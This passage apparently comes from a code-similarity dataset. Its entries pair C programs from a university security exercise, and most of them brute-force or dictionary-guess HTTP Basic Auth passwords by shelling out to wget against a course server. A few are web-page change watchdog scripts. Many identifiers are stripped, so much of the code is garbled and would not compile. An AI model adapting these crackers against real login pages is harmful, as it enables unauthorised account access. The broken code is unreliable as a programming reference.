\ chSet[], int numOfCh, char ch)\n{\n\tint i;\n\t\n\tfor (i=0; i<numOfCh; i++)\n\
|
217 |
+
\t{\n\t\tif (chSet[i] == ch)\n\t\t{\n\t\t\treturn i;\n\t\t}\n\t}\n\n\treturn -1;\n\
|
218 |
+
\t\n}\n\nchar* initPasswdStr(int len, char ch)\n{\n\tint i;\n\n\tchar *str;\n\n\
|
219 |
+
\tstr = malloc(len);\n\n\tif (str)\n\t{\n\t\tfor (i=0; i<len; i++)\n\t\t{\n\t\t\
|
220 |
+
\tstr[i] = ch;\n\t\t}\n\t\tstr[len] = '\\0';\n\t}\n\telse\n\t{\n\t\tfprintf(stderr,\
|
221 |
+
\ \"\\nError: Unable allocate %d bytes memory.\");\n\t\texit(1);\n\t}\n\t\n\t\
|
222 |
+
return str;\n}\n\nint pow(int x, int y)\n{\n\tint ans = 1, i;\n\t\n\tfor (i=0;\
|
223 |
+
\ i<y; i++)\n\t{\n\t\tans *= x;\n\t}\n\n\treturn ans;\n}\n\nint crackHTTPAuth(const\
|
224 |
+
\ char *username, const char *passwd)\n{\n\tchar cmd[256];\n\tstruct stat fileInfo;\n\
|
225 |
+
\t\n\tsprintf(cmd, \"wget -O -q --http-user=%s --http-passwd=%s --proxy=off %s\"\
|
226 |
+
, \n\t\t\t\t\t\tusername, passwd, URL);\n\n\tsystem(cmd);\t\n\n\t(void)stat(\"\
|
227 |
+
\", &fileInfo); \n\n\treturn fileInfo.st_size;\n\t\n}\n\n"
|
228 |
+
- "#include<stdio.h>\n#include<stdlib.h>\n#include<strings.h>\n#include<ctype.h>\n\
|
229 |
+
#include <sys/time.h>\n#define OneBillion 1e9\n\nint ()\n{ int startTime, stopTime,\
|
230 |
+
\ final;\n int i,j,k;\n FILE* fp;\n int pass,len;\n int count = 0;\n\
|
231 |
+
\ char [50];\n char url1[100];\n char url2[100];\n\n startTime = time();\n\
|
232 |
+
\ fp = fopen(\"/usr/share/lib/dict/words\",\"r\");\n while (fp !='\\0')\n\
|
233 |
+
\ {\n fgets( ,50,fp);\n\n len = strlen();\n [strlen()-1]\
|
234 |
+
\ ='\\0';\n\n if(len <= 4)\n {\n count++;\n\t printf(\"\
|
235 |
+
Checking for the word :%s\\n\",);\n\t strcpy(url1 ,\"wget --http-user= --http-passwd=\"\
|
236 |
+
);\n\t strcat(url1,);\n\t strcpy(url2 , \" -nv -o output http://sec-crack.cs.rmit.edu./SEC/2/\
|
237 |
+
\ \");\n\t strcat(url1,url2);\n\n\n\t pass = system(url1);\n\t if (pass\
|
238 |
+
\ == 0)\n\t {\n\t stopTime = time();\n final = stopTime-startTime;\n\
|
239 |
+
\t printf(\"\\n SUCCESS\\n\");\n\t printf(\"The password for the user\
|
240 |
+
\ : %s\\n \",);\n\t printf(\"Found the password in %lld nanoseconds (%1f\
|
241 |
+
\ seconds) \\n\",final,(double)final/OneBillion);\n\t printf(\"Number of\
|
242 |
+
\ attempts : %d\\n\",count);\n exit(1);\n\t }\n }\n }\n\n\
|
243 |
+
\ }\n"
|
244 |
+
- "#include<stdio.h>\n#include<stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n\
|
245 |
+
#include <sys/time.h>\n\nint ()\n{\n char lc[53]=\"abcdefghijlmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\
|
246 |
+
;\n char uc[53]=\"abcdefghijlmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\n char\
|
247 |
+
\ gc[53]=\"abcdefghijlmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\n int a=0,b=0,c=0,d,e,count=0;\n\
|
248 |
+
\ char [100],temp1[100],temp2[100],temp3[100],temp4[10],temp5[50],p[100],q[50],r[50];\n\
|
249 |
+
\ char result,result1,result2,mx[100],mx1,mx2,mx3,mx4;\n \n int ,end,t;\n =\
|
250 |
+
\ time(); \nwhile(sizeof(lc)!=52)\n{\n temp2[0]=lc[d];\n temp2[1]='\\\
|
251 |
+
0';\n d=d+1;\n strcpy(p,temp2);\n \n while(sizeof(uc)!=52)\n {\n\
|
252 |
+
\ temp3[0]=uc[b];\n temp3[1]='\\0';\n b=b+1;\n strcpy(q,p);\n\
|
253 |
+
\ strcat(q,temp3);\n for(e=0;e<52;e++)\n {\n temp1[0]=gc[e];\n\
|
254 |
+
\ttemp1[1]='\\0';\n\tstrcpy(r,q);\n\tstrcat(r,temp1);\n strcpy(mx,\"wget\
|
255 |
+
\ http://sec-crack.cs.rmit.edu./SEC/2 --http-user= --http-passwd=\");\n \
|
256 |
+
\ strcat(mx,r);\n printf(\"temp3=%s\\n\",mx);\n if(system(mx)==0)\n\
|
257 |
+
\ { \n printf(\"Password=%s\\n\",mx);\n\t printf(\"%d \\n\",count);\n\
|
258 |
+
\t end = time();\n t = (end -);\n t /= 1000000000.0;\n \
|
259 |
+
\ printf(\"The total time_var taken is:%llds\\n\",t);\n\t exit(1);\n \n\
|
260 |
+
\ }\n }\n }\n }\n return 0;\n}\n"
|
261 |
+
- source_sentence: "\n\n\n\n\n\n\n\n\n\n\n\n#include<stdio.h>\n#include<stdlib.h>\n\
|
262 |
+
#include<strings.h>\n#include<sys/types.h>\n#include<sys/times.h>\n#include<sys/time.h>\n\
|
263 |
+
#include<unistd.h>\n\nint ()\n{\n char url[80];\n char syscom[]= \"wget -nv\
|
264 |
+
\ --http-user= --http-passwd=\";\n char http[] = \"http://sec-crack.cs.rmit.edu./SEC/2/\"\
|
265 |
+
;\n char [] =\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\";\n\n char\
|
266 |
+
\ username[8];\n char pass[4];\n int i,j,k,hack=1;\n int attempt = 1;\n int\
|
267 |
+
\ , end, time_var;\n\n = time();\n for ( i = 0 ;i<strlen();i++)\n {\n \
|
268 |
+
\ pass[0]=[i];\n for( j = 0 ;j<strlen();j++)\n {\n pass[1]=[j];\n\
|
269 |
+
\ for ( k = 0 ;k<strlen();k++)\n {\n fflush(stdin);\n\
|
270 |
+
\ pass[2]=[k];\n pass[3]='\\0';\n printf(\"\
|
271 |
+
%s\\n\",pass);\n\n sprintf(url,\"%s%s %s\",syscom,pass,http);\n\
|
272 |
+
\ hack = system(url);\n attempt++;\n \
|
273 |
+
\ if (hack == 0)\n {\n end = time();\n \
|
274 |
+
\ time_var = (end-);\n printf(\"\\nbr\tThe password\
|
275 |
+
\ is :%s\",pass);\n printf(\"\\nNo. of Attempts crack the password\
|
276 |
+
\ :%d\",attempt);\n printf(\"\\nTime taken crack the password\
|
277 |
+
\ = %lld sec\\n\",time_var/1000000000);\n exit(1);\n \
|
278 |
+
\ }\n }\n }\n }\n }\n\n"
|
279 |
+
sentences:
|
280 |
+
- "#include<stdio.h>\n#include<string.h>\n#include<strings.h>\n#include<stdlib.h>\n\
|
281 |
+
#include<sys/time.h>\n\n()\n{\n\tint i,m,k,count=0;\n\tFILE* diction;\n\tFILE*\
|
282 |
+
\ log;\n\tchar s[30];\n\tchar pic[30];\n\tchar add[1000];\n\tchar end[100];\n\t\
|
283 |
+
time_t ,finish;\n\tdouble ttime;\n\t\n\tstrcpy(add,\"wget --http-user= --http-passwd=\"\
|
284 |
+
);\n\tstrcpy( end,\"-nv -o logd http://sec-crack.cs.rmit.edu./SEC/2/\");\n\tdiction=fopen(\"\
|
285 |
+
/usr/share/lib/dict/words\",\"r\");\n\t=time(NULL);\n\twhile(fgets(s,100,diction)!=NULL)\t\
|
286 |
+
\n\t{\t\n\t\tprintf(\"%s\\n\",s);\n\t\tfor(m=40,k=0;k<(strlen(s)-1);k++,m++)\n\
|
287 |
+
\t\t{\n\t\t\tadd[m]=s[k];\n\t\t}\n\t\tadd[m++]=' ';\n\t\tfor(i=0;i<50;i++,m++)\n\
|
288 |
+
\t\t{\n\t\t\tadd[m]=end[i];\n\t\t}\n\t\tadd[m]='\\0';\n\t\t\n\t\tsystem(add);\n\
|
289 |
+
\t\tcount++;\n\t\tlog=fopen(\"logd\",\"r\");\n\t\tfgets(pic,100,log);\n\t\tprintf(\"\
|
290 |
+
%s\",pic);\n\t\tif(strcmp(pic,\"Authorization failed.\\n\")!=0)\t\n\t\t{\n\t\t\
|
291 |
+
\tfinish=time(NULL);\n\t\t\tttime=difftime(,finish);\n\t\t\tprintf( \"\\n The\
|
292 |
+
\ time_var take:%f/n The of passwords tried is %d\\n\",ttime,count);\n\t\t\t\
|
293 |
+
break;\n\t\t}\n\t\tfclose(log);\n\t}\n\n}\n"
|
294 |
+
- "#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n\
|
295 |
+
\n#define MAX_SIZE 255\n\n\nint CrackPasswd(FILE *fp)\n{\n int i, cnt, flag;\n\
|
296 |
+
\ char string1[MAX_SIZE],string2[MAX_SIZE],[MAX_SIZE], passwd[MAX_SIZE];\n \
|
297 |
+
\ char fin;\n \n strcpy(string1,\"wget http://sec-crack.cs.rmit.edu./SEC/2/\"\
|
298 |
+
);\n strcpy(string2,\" --http-user= --http-passwd='\");\n strcpy(,\"\");\n\
|
299 |
+
\n while ((fin = fgetc(fp)) != EOF)\n {\n cnt = 0;\n \n for\
|
300 |
+
\ (i=0;i<MAX_SIZE;i++)\n { \n passwd[i] = '\\0';\n [i]\
|
301 |
+
\ = '\\0';\n }\n\t \n while(fin != '\\n')\n {\n\t passwd[cnt] =\
|
302 |
+
\ fin;\n\t cnt++;\n\t fin = fgetc(fp);\n } \n \n if(strlen(passwd)\
|
303 |
+
\ <= 3)\n {\n strcat(, string1);\n strcat(, string2);\n\t\
|
304 |
+
\ strcat(, passwd);\n\t strcat(, \"'\");\n\t printf(\"Sending Request as %s\\\
|
305 |
+
n\",);\n\t flag = system();\n\t \n if (flag == 0)\n\t {\n \
|
306 |
+
\ printf(\"\\nPassword is %s\\n\",passwd);\n\t return 1;\n\t }\n \n\
|
307 |
+
\t strcpy(,\"\"); \n strcpy(passwd,\"\");\n }\n }\n} \n\n\n\
|
308 |
+
int (int argc, char *argv[])\n{\n char *fname;\n FILE *fp;\n \n int ,\
|
309 |
+
\ end; \n \n = time();\n \n if (argc != 2)\n {\n fprintf(stdout,\"\
|
310 |
+
Usage : ./Dictionary <dictionary>\\n\");\n return(EXIT_FAILURE);\n }\n\
|
311 |
+
\ \n fname = argv[1];\n \n if((fp = fopen(fname, \"r\")) == NULL)\n \
|
312 |
+
\ {\n fprintf(stderr,\"Error : Failed open %s for . \\n\",fname);\n \
|
313 |
+
\ return(EXIT_FAILURE);\n }\n \n CrackPasswd(fp);\n \n end = time();\
|
314 |
+
\ \n printf(\"Time Required = %lld msec\\n\",(end-)/());\n return (EXIT_SUCCESS);\n\
|
315 |
+
\ \n}\n \n\t \n\t \t\n"
|
316 |
+
- "#include<stdio.h>\n#include<stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n\
|
317 |
+
#include <sys/time.h>\n\nint ()\n{\n FILE *fh,*fp,*fp1,*d;\n char\n [10000],PassString[50],p[10000],temp1[10000],filename[50],f1,f2,temp2[100];\n\
|
318 |
+
\ sleep(60*60*24);\n system(\"wget http://www.cs.rmit.edu./students\");\n if(system==0)\n\
|
319 |
+
\ {\n printf(\"File stored\");\n }\n strcpy(filename,\"index.html\"); \n\
|
320 |
+
\ if((fh=fopen(filename,\"r\"))==NULL)\n {\n printf(\"cannot open file\\n\"\
|
321 |
+
);\n exit(1);\n }\n fp=fopen(\"index.txt\",\"r\");\n fp1=fopen(\"index1.txt\"\
|
322 |
+
,\"r\");\n \n while((fgets(PassString,sizeof(PassString),fh))!= NULL)\n {\n\
|
323 |
+
\ fread(p,sizeof(PassString),sizeof(PassString),fh);\n printf(\" contents\
|
324 |
+
\ %s\\n\",p);\n while((f1!=EOF) || (f2!=EOF))\n {\n f1=getc(fp);\n \
|
325 |
+
\ f2=getc(fp1);\n if(f1<f2)\n {\n strcpy(,p);\n fp=fopen(\"\
|
326 |
+
index.txt\",\"r+b\");\n fputs(,fp);\n fflush(fp); \n fclose(fp); \n\
|
327 |
+
\ }\n else\n {\n strcpy(temp1,p);\n fp1=fopen(\"index1.txt\"\
|
328 |
+
,\"r+b\");\n fputs(temp1,fp1);\n fflush(fp1);\n fclose(fp1);\n\
|
329 |
+
\ }\n }\n if(system(\"diff -b -w index.txt index1.txt > Diff.txt\")==0)\n\
|
330 |
+
\ {\n d=fopen(\"Diff.txt\",\"r\");\n if((fgets(,sizeof(),d))!=NULL)\n\
|
331 |
+
\ {\n printf(\"The difference between exist\");\n\tsystem(\"Mail\
|
332 |
+
\ \\r\\n Difference\");\n }\n \n }\n }\n return 0;\n }\n"
|
333 |
+
- source_sentence: "#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n\
|
334 |
+
\n#define MAX_SIZE 255\n\n\nint CrackPasswd(FILE *fp)\n{\n int i, cnt, flag;\n\
|
335 |
+
\ char string1[MAX_SIZE],string2[MAX_SIZE],[MAX_SIZE], passwd[MAX_SIZE];\n \
|
336 |
+
\ char fin;\n \n strcpy(string1,\"wget http://sec-crack.cs.rmit.edu./SEC/2/\"\
|
337 |
+
);\n strcpy(string2,\" --http-user= --http-passwd='\");\n strcpy(,\"\");\n\
|
338 |
+
\n while ((fin = fgetc(fp)) != EOF)\n {\n cnt = 0;\n \n for\
|
339 |
+
\ (i=0;i<MAX_SIZE;i++)\n { \n passwd[i] = '\\0';\n [i]\
|
340 |
+
\ = '\\0';\n }\n\t \n while(fin != '\\n')\n {\n\t passwd[cnt] =\
|
341 |
+
\ fin;\n\t cnt++;\n\t fin = fgetc(fp);\n } \n \n if(strlen(passwd)\
|
342 |
+
\ <= 3)\n {\n strcat(, string1);\n strcat(, string2);\n\t\
|
343 |
+
\ strcat(, passwd);\n\t strcat(, \"'\");\n\t printf(\"Sending Request as %s\\\
|
344 |
+
n\",);\n\t flag = system();\n\t \n if (flag == 0)\n\t {\n \
|
345 |
+
\ printf(\"\\nPassword is %s\\n\",passwd);\n\t return 1;\n\t }\n \n\
|
346 |
+
\t strcpy(,\"\"); \n strcpy(passwd,\"\");\n }\n }\n} \n\n\n\
|
347 |
+
int (int argc, char *argv[])\n{\n char *fname;\n FILE *fp;\n \n int ,\
|
348 |
+
\ end; \n \n = time();\n \n if (argc != 2)\n {\n fprintf(stdout,\"\
|
349 |
+
Usage : ./Dictionary <dictionary>\\n\");\n return(EXIT_FAILURE);\n }\n\
|
350 |
+
\ \n fname = argv[1];\n \n if((fp = fopen(fname, \"r\")) == NULL)\n \
|
351 |
+
\ {\n fprintf(stderr,\"Error : Failed open %s for . \\n\",fname);\n \
|
352 |
+
\ return(EXIT_FAILURE);\n }\n \n CrackPasswd(fp);\n \n end = time();\
|
353 |
+
\ \n printf(\"Time Required = %lld msec\\n\",(end-)/());\n return (EXIT_SUCCESS);\n\
|
354 |
+
\ \n}\n \n\t \n\t \t\n"
|
355 |
+
sentences:
|
356 |
+
- "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/time.h>\n#include <strings.h>\n\
|
357 |
+
#include <ctype.h>\n\nint ()\n{\n FILE *fp; \n char *chk,[4];\n int i=1;\n\
|
358 |
+
\ while (i == 1) \n {\n \n system(\"wget -p --convert-links http://www.cs.rmit.edu./students/\"\
|
359 |
+
);\n\n system(\"mkdir first\"); \n system(\"mkdir second\"); \n\n \n system(\"\
|
360 |
+
mv www.cs.rmit.edu./images/*.* first/\");\n system(\"mv www.cs.rmit.edu./students/*.*\
|
361 |
+
\ first/\");\n\n sleep(86400); \n\n \n system(\"wget -p --convert-links http://www.cs.rmit.edu./students/\"\
|
362 |
+
);\n\n \n system(\"mv www.cs.rmit.edu./images/*.* second/\");\n system(\"mv\
|
363 |
+
\ www.cs.rmit.edu./students/*.* second/\");\n\n \n \n system(\"diff first second\
|
364 |
+
\ > imagesdifference.txt\");\n\n \n fp = fopen(\"imagesdifference.txt\",\"r\"\
|
365 |
+
);\n \n chk = fgets(, 4, fp);\n \n if (strlen() != 0)\n system(\"mailx\
|
366 |
+
\ -s \\\"Difference from WatchDog\\\" < imagesdifference.txt\");\n }\n return\
|
367 |
+
\ 0;\n}\n"
|
368 |
+
- "\n\n\n \n\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/stat.h>\n#include\
|
369 |
+
\ <unistd.h>\n#include <sys/wait.h>\n#include <signal.h>\n#include <sys/signal.h>\t\
|
370 |
+
\t\t \n\n\n#define USERNAME \"\"\n#define URL \"sec-crack.cs.rmit.edu./SEC/2\"\
|
371 |
+
\n#define TEST_URL \"yallara.cs.rmit.edu./~/secure\"\n#define MAX_PASSWD_LEN 3\n\
|
372 |
+
#define MAX_CHAR_SET 52\n#define NUM_OF_PROCESSES 4\n\n#define TRUE 1\n#define\
|
373 |
+
\ FALSE 0\n\n\n\n\n\n\n\n\n\n\ntypedef int (*CrackFuncPtr)(const char*, const\
|
374 |
+
\ char*, int);\n\n\nint pwdFound;\nint cDie;\n\n\nint runBruteForce(const char\
|
375 |
+
\ chSet[], int numOfCh, int len, CrackFuncPtr func\n\t\t\t\t\t\t, int sCh, int\
|
376 |
+
\ eCh, int id);\nchar* initPasswdStr(int len, char ch, char headOfChSet);\nint\
|
377 |
+
\ getChPos(const char chSet[], int numOfCh, char ch);\nint pow(int x, int y);\n\
|
378 |
+
int crackHTTPAuth(const char *username, const char *passwd, int id);\nint myFork(const\
|
379 |
+
\ char chSet[], int numOfCh, int len, CrackFuncPtr func\n\t\t\t\t, int sCh, int\
|
380 |
+
\ eCh);\n\n\n\n\n\nvoid passwdFoundHandler(int signum)\n{\n\tpwdFound = TRUE;\n\
|
381 |
+
}\n\n\n\nvoid childFinishHandler(int signum)\n{\n\tcDie++;\t\n}\n\n\n\n\n\nint\
|
382 |
+
\ main()\n{\n\tchar charSet[] = {'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I',\
|
383 |
+
\ 'J', 'K', \n 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',\
|
384 |
+
\ 'U', 'V', \n\t\t\t\t\t 'W', 'X', 'Y', 'Z',\t\n\t\t\t\t\t 'a', 'b', 'c', 'd',\
|
385 |
+
\ 'e', 'f', 'g', 'h', 'i', 'j', 'k',\t\n\t\t\t\t\t 'l', 'm', 'n', 'o', 'p', 'q',\
|
386 |
+
\ 'r', 's', 't', 'u', 'v', \n\t\t\t\t\t 'w', 'x', 'y', 'z'};\n\t\n\n\tint i;\t\
|
387 |
+
\n\tint pid[NUM_OF_PROCESSES];\n\n\tpwdFound = FALSE;\n\tcDie = 0;\n\t\n\tfor\
|
388 |
+
\ (i=0; i<NUM_OF_PROCESSES; i++)\n\t{\n\t\tpid[i] = myFork(charSet, MAX_CHAR_SET,\
|
389 |
+
\ MAX_PASSWD_LEN, crackHTTPAuth, \n\t\t\t\t\t\t(((MAX_CHAR_SET /NUM_OF_PROCESSES)*i)+1)-1,\
|
390 |
+
\ \n\t\t\t\t\t\t(MAX_CHAR_SET /NUM_OF_PROCESSES)*(i+1)-1);\n\t}\n\n\t\n\tfor (;;)\n\
|
391 |
+
\t{\n\t\tsignal(SIGUSR1, passwdFoundHandler);\n\t\tsignal(SIGUSR2, childFinishHandler);\n\
|
392 |
+
\n\t\t\n\t\tif (pwdFound)\n\t\t{\n\t\t\tfor (i=0; i<4; i++)\n\t\t\t{\n\t\t\t\t\
|
393 |
+
kill((int)pid[i], SIGKILL);\n\t\t\t}\n\t\t\texit(EXIT_SUCCESS);\n\t\t}\n\n\t\t\
|
394 |
+
\n\t\tif (cDie >= NUM_OF_PROCESSES)\n\t\t{\n\t\t\texit(EXIT_SUCCESS);\n\t\t}\n\
|
395 |
+
\n\t}\n\treturn EXIT_SUCCESS;\n}\n\n\n\nint myFork(const char chSet[], int numOfCh,\
|
396 |
+
\ int len, CrackFuncPtr func,\n\t\t\t\tint sCh, int eCh)\n{\n\tint i;\n\t\n\t\
|
397 |
+
int pid = fork();\n\n\tif (pid == 0)\n\t{\n\t\tfor (i=1; i<=len; i++)\n\t\t{\n\
|
398 |
+
\t\t\tif (runBruteForce(chSet, numOfCh, i, func, sCh, eCh, getpid()))\n\t\t\t\
|
399 |
+
{\t\n\t\t\t\t\n \t\t\t\tif (!kill(getppid(), SIGUSR1))\n\t\t\t\t{\n\t\t\t\t\t\
|
400 |
+
printf(\"Process %d found the password and notified the parent process already\"\
|
401 |
+
, \n\t\t\t\t\t\t\t\t\t(int)getpid());\n\t\t\t\t}\n\n\t\t\t\texit(EXIT_SUCCESS);\n\
|
402 |
+
\t\t\t}\n\t\t}\n\n\t\t\n\t\tif (!kill(getppid(), SIGUSR2))\n\t\t{\n\t\t\tprintf(\"\
|
403 |
+
Process %d could not found the password and notified the parent process already\"\
|
404 |
+
, \n\t\t\t\t\t\t\t\t\t(int)getpid());\n\t\t}\n\t\t\n\t\texit(EXIT_SUCCESS);\n\t\
|
405 |
+
}\n\telse if (pid > 0)\n\t{\n\t\treturn pid;\n\t}\n\telse\n\t{\n\t\tprintf(\"\
|
406 |
+
error\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\n\n\nint runBruteForce(const char\
|
407 |
+
\ chSet[], int numOfCh, int len, CrackFuncPtr func\n\t\t\t\t\t\t, int sCh, int\
|
408 |
+
\ eCh, int id)\n{\n\tint iter; \n\tint chIter; \n\tint curPos = 0; \n\t\n\tchar\
|
409 |
+
\ *str;\n\t\n\tint passwdFound = FALSE;\n\t\n\tstr = initPasswdStr(len, chSet[sCh],\
|
410 |
+
\ chSet[0]);\n\n\tprintf(\"\\nNow trying %d character(s)\\n\", len);\n\n\tfor\
|
411 |
+
\ (iter=0; (iter<pow(numOfCh, (len-1))*(eCh-sCh+1))&&(!passwdFound); iter++)\n\
|
412 |
+
\t{\n\t\tfor (chIter=len-1; chIter>=0; chIter--)\n\t\t{\n\t\t\tif (iter % pow(numOfCh,\
|
413 |
+
\ chIter) == 0) \n\t\t\t{\n\t\t\t\tcurPos = getChPos(chSet, numOfCh, str[chIter]);\n\
|
414 |
+
\t\t\t\tstr[chIter] = chSet[curPos+1];\n\t\t\t}\n\n\t\t\tif (iter % pow(numOfCh,\
|
415 |
+
\ (chIter+1)) == 0) \n\t\t\t{\n\t\t\t\tif (chIter == len-1)\n\t\t\t\t{\n\t\t\t\
|
416 |
+
\t\tstr[chIter] = chSet[sCh];\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t\
|
417 |
+
str[chIter] = chSet[0];\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tif (func(USERNAME, str,\
|
418 |
+
\ id))\n\t\t{\n\t\t\tprintf(\"\\nPassword found: %s\\n\\n\", str);\n\t\t\tpasswdFound\
|
419 |
+
\ = TRUE;\n\t\t}\t\t\t\n\t}\n\n\t(str);\n\tstr = NULL;\n\t\n\treturn passwdFound;\n\
|
420 |
+
}\n\n\n\nint getChPos(const char chSet[], int numOfCh, char ch)\n{\n\tint i;\n\
|
421 |
+
\t\n\tfor (i=0; i<numOfCh; i++)\n\t{\n\t\tif (chSet[i] == ch)\n\t\t{\n\t\t\treturn\
|
422 |
+
\ i;\n\t\t}\n\t}\n\n\treturn -1;\n\t\n}\n\n\n\nchar* initPasswdStr(int len, char\
|
423 |
+
\ ch, char headOfChSet)\n{\n\tint i;\n\n\tchar *str;\n\n\tstr = malloc(len);\n\
|
424 |
+
\n\tif (str)\n\t{\n\t\tfor (i=0; i<len-1; i++)\n\t\t{\n\t\t\tstr[i] = headOfChSet;\n\
|
425 |
+
\t\t}\n\t\tstr[len-1] = ch;\n\t\tstr[len] = '\\0';\n\t}\n\telse\n\t{\n\t\tfprintf(stderr,\
|
426 |
+
\ \"\\nError: Unable allocate %d bytes memory.\", len);\n\t\texit(EXIT_FAILURE);\n\
|
427 |
+
\t}\n\t\n\treturn str;\n}\n\n\n\nint pow(int x, int y)\n{\n\tint ans = 1, i;\n\
|
428 |
+
\t\n\tfor (i=0; i<y; i++)\n\t{\n\t\tans *= x;\n\t}\n\n\treturn ans;\n}\n\n\n\n\
|
429 |
+
int crackHTTPAuth(const char *username, const char *passwd, int id)\n{\n\tchar\
|
430 |
+
\ cmd[256];\n\tstruct stat fileInfo;\n\tchar fileToCheck[256];\n\t\n\tsprintf(cmd,\
|
431 |
+
\ \"wget -O %d -q --http-user=%s --http-passwd=%s --proxy=off %s\", \n\t\t\t\t\
|
432 |
+
\t\tid, username, passwd, URL);\n\n\tsystem(cmd);\t\n\n\tsprintf(fileToCheck,\
|
433 |
+
\ \"%d\", id);\n\n\t(void)stat(fileToCheck, &fileInfo); \n\treturn fileInfo.st_size;\n\
|
434 |
+
\t\n}\n\n\n"
|
435 |
+
- "#include<stdio.h>\n#include<stdlib.h>\n#include<string.h>\n#include<strings.h>\n\
|
436 |
+
#include <ctype.h>\n#include <math.h>\n#include <sys/time.h>\n\nint\n()\n{\n\n\
|
437 |
+
\tint , end;\n\tFILE *fp;\n\tint i, j;\n\tchar \
|
438 |
+
\ input;\n\tchar password[30];\n\tint check;\n\
|
439 |
+
\n\tfloat total_time;\n\tint number;\n\t = time();\n\n\n\
|
440 |
+
\tif ((fp = fopen(\"words\", \"r\")) == NULL) {\n\t\tfprintf(stderr, \"Error :\
|
441 |
+
\ Failed open words for .\\n\");\n\t\treturn (EXIT_FAILURE);\n\t}\n\twhile ((input\
|
442 |
+
\ = fgetc(fp)) != EOF) {\n\t\tj = 0;\n\t\tfor (i = 0; i < 30; i++)\n\t\t\tpassword[i]\
|
443 |
+
\ = '\\0';\n\n\t\twhile(input != '\\n' ) {\n\n\t\t\tpassword[j] = input;\n\t\t\
|
444 |
+
\tj++;\n\t\t\tinput = fgetc(fp);\n\t\t\t\n\t\t\n\t\t}\n\n\n\t\tif (strlen(password)\
|
445 |
+
\ <= 3) {\n\t\t\tprintf(\"%s\\t\",password);\n\t\t\tfflush(stdout);\n\t\t\tcheck\
|
446 |
+
\ = SysCall(password);\n\t\t\tif (check == 0) {\n\t\t\t\tgetpid();\n\t\t\t\tend\
|
447 |
+
\ = time();\n\t\t\t\ttotal_time = (end - ) / 1e9;\n\t\t\t\tprintf(\"\\ntotal time_var\
|
448 |
+
\ = %f \", total_time);\n\t\t\t\tprintf(\"\\n\\nAvg getpid() time_var = %f usec\\\
|
449 |
+
n\", total_time);\n\t\t\t\tprintf(\"\\navg time_var %f / %d = %f\\n\", total_time,\
|
450 |
+
\ number, total_time / number);\n\t\t\t\texit(0);\n\t\t\t}\n\t\t}\n\n\t}\n\n\t\
|
451 |
+
return (EXIT_SUCCESS);\n}\nint\nSysCall(char *password)\n{\n\tchar \
|
452 |
+
\ url1[255], url2[255], [255];\n\tint rettype;\n\trettype = 0;\n\t\
|
453 |
+
strcpy(url1, \"wget --non-verbose --http-user= --http-passwd=\");\n\tstrcpy(url2,\
|
454 |
+
\ \" http://sec-crack.cs.rmit.edu./SEC/2/index.php\");\n\n\tstrcat(, url1);\n\t\
|
455 |
+
strcat(, password);\n\tstrcat(, url2);\n\n\trettype = system();\n\t\n\tif (rettype\
|
456 |
+
\ == 0) {\n\t\tprintf(\"Successfully retrieved password: %s\\n\", password);\n\
|
457 |
+
\t\treturn 0;\n\t}\n\tstrcpy(, \"\");\n}\n"
|
458 |
+
- source_sentence: "\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\nint ()\n{\n \
|
459 |
+
\ int i,j,k,counter =0;\n char word[3];\n char paswd[3];\t\n char get[100];\n\
|
460 |
+
\ int ;\n char username[]=\"\";\n \n \n \n \n \n\t\t\t\t\n\t\n\tfor (i\
|
461 |
+
\ = 65; i <= 122; i++)\n\t{\n\t\t if(i==91) {i=97;} \n \n\t\tfor (j = 65; j\
|
462 |
+
\ <= 122; j++)\n\t\t{\n\t\t\n\t\tif(j==91) {j=97;}\n \n\t\tfor (k = 65; k\
|
463 |
+
\ <= 122; k++)\n\t\t{\n\t\t \n\t\t\tif(k==91) {k=97;} \n\t\t\t\n\t\t\t word[0]\
|
464 |
+
\ = i;\n\t\t\t word[1] = j;\n\t\t\t word[2] = k;\n\t\t\t sprintf(paswd,\"%c%c%c\"\
|
465 |
+
,word[0],word[1],word[2]); \n\t\t\t counter++;\n\t\t\tprintf(\"%d )%s\\\
|
466 |
+
n\\n\", counter, paswd);\n\t\t\t sprintf(get,\"wget --http-user=%s --http-passwd=%s\
|
467 |
+
\ http://sec-crack.cs.rmit.edu./SEC/2/\",username,paswd);\n\t\t\t=system(get);\n\
|
468 |
+
\t \n\t\t\tif(==0) \n\t\t\t{\n\t\t\tprintf(\"The Password has been cracked and\
|
469 |
+
\ it is : %s\" , paswd);\n\t\t\texit(0);\n\t\t\t}\n\t\t}\n \n\t\t}\n \n\t\
|
470 |
+
}\n \n\t\n}\n\n"
|
471 |
+
sentences:
|
472 |
+
- "\n\n#include <stdio.h>\n#include <string.h>\n#include <sys/time.h>\n\n#define\
|
473 |
+
\ OneBillion 1e9\n#define false 0\n#define true 1\nint execPassword(char *, char\
|
474 |
+
\ *b) {\n\n\n char [100]={'\\0'};\n strcpy(,b);\n \n strcat(,);\n\
|
475 |
+
\ printf (\"Sending command %s\\n\",);\n if ( system()== 0) {\n printf\
|
476 |
+
\ (\"\\n password is : %s\",);\n return 1;\n }\n return 0;\n}\n \n\
|
477 |
+
\nint bruteForce(char [],char comb[],char *url) {\n\n\nint i,j,k;\n\n for(i=0;i<52\
|
478 |
+
\ ;i++) {\n comb[0]= [i];\n if (execPassword(comb,url)== 1) return\
|
479 |
+
\ 1; \n for(j=0;j<52;j++) {\n comb[1] = [j];\n \
|
480 |
+
\ if(execPassword(comb,url)==1) return 1;\n for(k=0;k<52;k++)\
|
481 |
+
